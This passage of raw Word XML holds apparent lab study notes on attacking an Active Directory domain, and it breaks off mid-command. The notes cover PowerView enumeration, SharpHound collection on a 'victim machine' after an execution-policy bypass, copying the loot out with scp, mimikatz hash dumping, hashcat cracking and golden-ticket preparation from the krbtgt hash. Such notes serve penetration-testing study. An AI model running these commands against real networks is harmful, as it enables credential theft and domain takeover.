        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Find shared folders not set by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F866D10" w14:textId="6404C57A" w:rsidR="007656CC" w:rsidRPr="0084205E" w:rsidRDefault="007656CC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ShareFinder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2618C7EB" w14:textId="60BC928F" w:rsidR="0024542F" w:rsidRPr="0084205E" w:rsidRDefault="0024542F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Find OS running inside of the network besides default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4F6472" w14:textId="324192DE" w:rsidR="0024542F" w:rsidRPr="0084205E" w:rsidRDefault="0024542F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>NetComputer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>fulldata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> | select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>operatingsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18AC215F" w14:textId="7FA5B747" w:rsidR="0024542F" w:rsidRPr="0084205E" w:rsidRDefault="0024542F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumeration with Bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1375207F" w14:textId="421F8A33" w:rsidR="0024542F" w:rsidRPr="0084205E" w:rsidRDefault="0024542F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>graphical interface that allows a visual mapping of a network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F05A83C" w14:textId="058F3721" w:rsidR="0024542F" w:rsidRPr="0084205E" w:rsidRDefault="0024542F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">combined with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>SharpHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – takes user, groups, trusts, etc. of network and collects them into .json files to be used inside of Bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62429FF0" w14:textId="52024873" w:rsidR="0024542F" w:rsidRPr="0084205E" w:rsidRDefault="0024542F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bloodhound Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA23D2B" w14:textId="7A7242A7" w:rsidR="0024542F" w:rsidRPr="0084205E" w:rsidRDefault="0024542F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>apt-get install bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C73FFAD" w14:textId="69081ADE" w:rsidR="0024542F" w:rsidRPr="0084205E" w:rsidRDefault="00B734DB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidR="0024542F" w:rsidRPr="0084205E">
        <w:t>neo4j console – default credentials – neo4</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001F57BD" w:rsidRPr="0084205E">
        <w:t>j:neo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001F57BD" w:rsidRPr="0084205E">
        <w:t>4j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FB967B" w14:textId="5BE99E21" w:rsidR="00B734DB" w:rsidRPr="0084205E" w:rsidRDefault="00B734DB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>leave running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655838F7" w14:textId="09B05484" w:rsidR="001F57BD" w:rsidRPr="0084205E" w:rsidRDefault="001F57BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Getting Loot with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sharphound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – on victim machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00199B40" w14:textId="10A1F2F4" w:rsidR="001F57BD" w:rsidRPr="0084205E" w:rsidRDefault="001F57BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -ep bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF23D1A" w14:textId="671A58B7" w:rsidR="001F57BD" w:rsidRPr="0084205E" w:rsidRDefault="001F57BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>. .\Downloads\SharpHound.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CA5BD7" w14:textId="55B73066" w:rsidR="001F57BD" w:rsidRPr="0084205E" w:rsidRDefault="001F57BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>syntax. Invoke-Bloodhound -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>CollectionMethod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;option&gt; -Domain &lt;domain&gt; -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ZipFileName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC46F15" w14:textId="7BB5B097" w:rsidR="001F57BD" w:rsidRPr="0084205E" w:rsidRDefault="001F57BD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ex. Invoke-Bloodhound -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>CollectionMethod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> All -Domain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>CONTROLLER.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ZipFileName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> loot.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C75F74" w14:textId="003F601B" w:rsidR="0069684F" w:rsidRPr="0084205E" w:rsidRDefault="0069684F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">pull loot file using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A569698" w14:textId="2B13501F" w:rsidR="0069684F" w:rsidRPr="0084205E" w:rsidRDefault="0069684F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">syntax - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> remote_username@10.10.0.2:/remote/file.txt /local/directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF5885C" w14:textId="61BCE068" w:rsidR="0069684F" w:rsidRPr="0084205E" w:rsidRDefault="0069684F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Administrator@10.10.154.64:/C:/Users/Administrator/20210119202107_loot.zip /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nicholas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F9D325" w14:textId="7DAB6A1B" w:rsidR="0069684F" w:rsidRPr="0084205E" w:rsidRDefault="0069684F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mapping the Network with Bloodhound - Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E97FB81" w14:textId="3DBDD5F7" w:rsidR="0069684F" w:rsidRPr="0084205E" w:rsidRDefault="0069684F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>run bloodhound command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C64098" w14:textId="72F49136" w:rsidR="00B734DB" w:rsidRPr="0084205E" w:rsidRDefault="00B734DB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>drag/drop .zip .json files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A64F57D" w14:textId="2B73CA11" w:rsidR="00B734DB" w:rsidRPr="0084205E" w:rsidRDefault="00B734DB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Queries/Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141BB4FC" w14:textId="7160B9CE" w:rsidR="00B734DB" w:rsidRPr="0084205E" w:rsidRDefault="00B734DB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Dumping Hashes with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26C51923" w14:textId="0D44CFE8" w:rsidR="00B734DB" w:rsidRPr="0084205E" w:rsidRDefault="00B734DB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E8AE5B" w14:textId="4F80ACE3" w:rsidR="00B734DB" w:rsidRPr="0084205E" w:rsidRDefault="00B734DB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>privilege::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1675683E" w14:textId="3644B677" w:rsidR="00B734DB" w:rsidRPr="0084205E" w:rsidRDefault="00B734DB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>20 Ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0518B565" w14:textId="61B6D9C6" w:rsidR="00B734DB" w:rsidRPr="0084205E" w:rsidRDefault="00B734DB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lsadump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /patch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECD7345" w14:textId="4CCB6FC8" w:rsidR="00A63420" w:rsidRPr="0084205E" w:rsidRDefault="00A63420" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>dumps hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338C354F" w14:textId="35380490" w:rsidR="00A63420" w:rsidRPr="0084205E" w:rsidRDefault="00A63420" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>copy and crack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4113D018" w14:textId="5630FA65" w:rsidR="00A63420" w:rsidRPr="0084205E" w:rsidRDefault="00A63420" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -m 1000 &lt;hash&gt; rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3002DD71" w14:textId="763DAEFB" w:rsidR="00A63420" w:rsidRPr="0084205E" w:rsidRDefault="00A63420" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Golden Ticket Attacks with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="376EC081" w14:textId="54A0A75B" w:rsidR="00A63420" w:rsidRPr="0084205E" w:rsidRDefault="003D5BB3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">dump hash and SID of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> user then create a golden ticket to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>open up</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> a new command prompt to allow for access to any machine on network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32412713" w14:textId="344DEB9C" w:rsidR="003D5BB3" w:rsidRPr="0084205E" w:rsidRDefault="003D5BB3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Dump the KRBTGT Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C549B50" w14:textId="47E6392E" w:rsidR="003D5BB3" w:rsidRPr="0084205E" w:rsidRDefault="003D5BB3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lsadump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /inject /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>name:krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="662C6516" w14:textId="3EAF9318" w:rsidR="003D5BB3" w:rsidRPr="0084205E" w:rsidRDefault="003D5BB3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Create a Golden Ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AAD582" w14:textId="6D7371EB" w:rsidR="003D5BB3" w:rsidRPr="0084205E" w:rsidRDefault="003D5BB3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">syntax - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>kerberos</w:t>
      </w:r>
